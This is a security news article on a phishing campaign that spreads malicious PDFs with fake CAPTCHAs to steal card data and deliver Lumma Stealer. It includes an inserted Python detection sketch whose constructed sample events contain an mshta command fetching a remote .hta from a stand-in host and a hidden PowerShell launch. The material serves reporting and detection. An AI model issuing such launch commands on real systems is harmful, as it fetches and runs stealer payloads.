
260 Domains Hosting 5,000 Malicious PDFs Stealing Credit Card Data


Netskope Threat Labs recently revealed a large-scale phishing operation that has been spreading across the internet. The operation involves 260 domains hosting approximately 5,000 malicious PDF files that are disguised as legitimate resources. These files use fake CAPTCHA prompts to redirect unsuspecting victims to phishing sites that are designed to steal credit card details and personal information.

This phishing campaign has been active since the second half of 2024 and has affected over 1,150 organizations and 7,000 users globally. The attackers behind this operation have targeted technology, financial services, and manufacturing sectors in regions such as North America, Asia, and Southern Europe.

One of the main tactics used in this campaign is search engine optimization (SEO) poisoning, where attackers ensure that malicious PDFs appear prominently in search results for common queries. Additionally, the attackers embed images of fake CAPTCHAs into the PDFs, hosted on platforms like Webflow’s content delivery network (CDN), to deceive users into interacting with what seems like a legitimate verification step.

When users click on these fake CAPTCHAs, they are directed to phishing pages that impersonate trusted brands. Here, victims are prompted to enter their payment details or login credentials, falling into the traps set by the cybercriminals. Netskope’s analysis of the situation revealed that a significant percentage of the malicious PDFs target users searching for user manuals or technical guides, as well as templates for invoices, tax forms, or legal agreements. The attackers strategically embedded keywords like “free,” “downloadable,” and “printable” in these files to exploit users looking for time-sensitive resources.

Moreover, the attackers expanded their reach by uploading the malicious PDFs to well-known repositories like PDFCoffee, PDF4Pro, and the Internet Archive, taking advantage of the inherent trustworthiness of these platforms. By utilizing multiple content delivery networks, including Webflow’s CDN and domains associated with GoDaddy, Strikingly, Wix, and Fastly, the attackers have made it challenging to detect their fraudulent content among legitimate traffic.

Researchers identified three distinct phishing strategies in this campaign: direct financial theft, credential harvesting, and malware delivery using the Lumma Stealer. While most PDFs focused on financial scams, some served as entry points for the Lumma Stealer, an infostealer capable of extracting sensitive information such as browser passwords, cryptocurrency wallets, and session cookies from victims.

The attack chain typically begins when a victim clicks on a download button embedded in a PDF, which redirects them to a page with instructions to paste a PowerShell command into the Windows Run dialog. This command fetches a script from a compromised WordPress site via mshta.exe (the Microsoft HTML Application host), which then downloads and executes the Lumma Stealer. To avoid detection, the attackers deliberately used PowerShell v1.0, a legacy version that is often overlooked by modern security monitoring tools.
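A detection sketch for the chain just described (Run-dialog launch, mshta.exe fetching a remote script, PowerShell invoked with a legacy engine), added here as an example and not taken from the article or from Netskope's research. The Sysmon-style field names (Image, ParentImage, CommandLine) and the sample events are constructed assumptions; the `-Version` switch is assumed to be how the legacy engine is requested.

```python
"""Process-creation rules for the mshta -> legacy PowerShell -> stealer chain.
Added example; the events below are constructed, not real telemetry."""
import re

# Constructed Sysmon-style Event ID 1 records. Events 0-1 model the chain
# from the article; events 2-3 are benign look-alikes that must not trip.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://compromised-site.example/wp-content/uploads/a.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'powershell.exe -Version 1.0 -NoProfile -w hidden -c "<stage2>"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\app.exe",
     "CommandLine": r"mshta C:\Program Files\Vendor\helper.hta"},
]

REMOTE_URL = re.compile(r"https?://", re.I)
# "-v 1" / "-Version 1.0" / "-Version 2.0": an explicit request for a legacy
# engine. Do NOT key on the ...\WindowsPowerShell\v1.0\ folder: that is the
# normal install path on every Windows host, not the engine version in use.
LEGACY_ENGINE = re.compile(r"(?:^|\s)-v(?:ersion)?\s+[12](?:\.0)?(?=\s|$)", re.I)

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of rule names an event trips (empty for benign events)."""
    image = _basename(event["Image"])
    parent = _basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        hits.append("mshta_remote_script")
    if image == "powershell.exe" and LEGACY_ENGINE.search(cmd):
        hits.append("powershell_legacy_engine")
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("powershell_spawned_by_mshta")
    # explorer.exe as parent covers Win+R / Run-dialog launches; on its own it
    # is a weak signal (shortcuts also qualify), so correlate it with the rest.
    if image in ("mshta.exe", "powershell.exe") and parent == "explorer.exe":
        hits.append("shell_launched_from_explorer")
    return hits

def scan(events):
    """Map event index -> rule hits, keeping only events that tripped a rule."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```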

In terms of sector-specific targeting, the technology sector bore the brunt of these attacks, followed by financial services and manufacturing. Geographically, the U.S., India, and Italy experienced the highest concentration of incidents, likely due to the dominance of these targeted industries in those regions.

Mitigating these attacks poses several challenges, especially in combating SEO-powered phishing campaigns that quickly re-emerge on different domains. Organizations are advised to deploy advanced URL filtering, restrict PowerShell execution to signed scripts, and educate employees about identifying suspicious PDF resources.

This recent phishing campaign sheds light on the increasing sophistication of cyber threats, where attackers combine social engineering tactics with infrastructure agility to deceive unsuspecting victims. As Netskope Threat Labs continues to monitor the threat landscape, the discovery emphasizes the importance of implementing layered defenses, incorporating AI-driven threat detection, strict endpoint policies, and cross-sector threat intelligence sharing.

With attackers leveraging trusted platforms to launch their attacks, proactive security measures must go beyond traditional network perimeter defenses to include user education and behavioral analytics. This highlights the need for organizations to stay vigilant and adopt robust security measures to protect themselves from evolving cyber threats.
